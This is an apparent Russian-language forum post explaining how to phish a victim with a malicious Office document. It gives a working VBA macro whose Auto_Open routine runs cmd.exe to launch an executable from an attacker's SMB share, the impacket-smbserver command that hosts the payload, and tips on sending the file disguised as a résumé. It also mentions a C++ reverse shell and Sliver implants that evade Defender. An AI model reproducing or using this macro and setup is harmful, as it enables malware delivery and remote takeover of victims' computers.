Тут нужно понять, что кобальтовая нагрузка очень сильно палится, так как работает по HTTP и собирается в процессе. Есть способ намного элегантнее
Советую почитать перед тем как пробовать
T1137: Phishing - Office Macros
Создаем макросс со следюшим кодом
Sub puni()
Shell "cmd.exe /c " & Chr(34) & "start \\\\IP\\puni\\puni.exe"""
End Sub
Sub Auto_Open()
puni
End Sub
Работают ток документы формата doc или xls сохроняем как word или exel 2003
Сначала проверить нужно у себя, что при открытие докумена открыватся сообщение. Если сообщения нету, значит где то косяк
Теперь можем проверить что все работает Запускаем наш smb server
impacket-smbserver -smb2support puni .
и отправляем резюме нашей подруге
Обычный мсф тут не прокатит, ну лично у меня не получилось. Пришлось порыться на гитхабе и нашел прикольный реверс на C++, который кстати не спалился моим дефендором. Так же неплохо работает нагрузка Sliver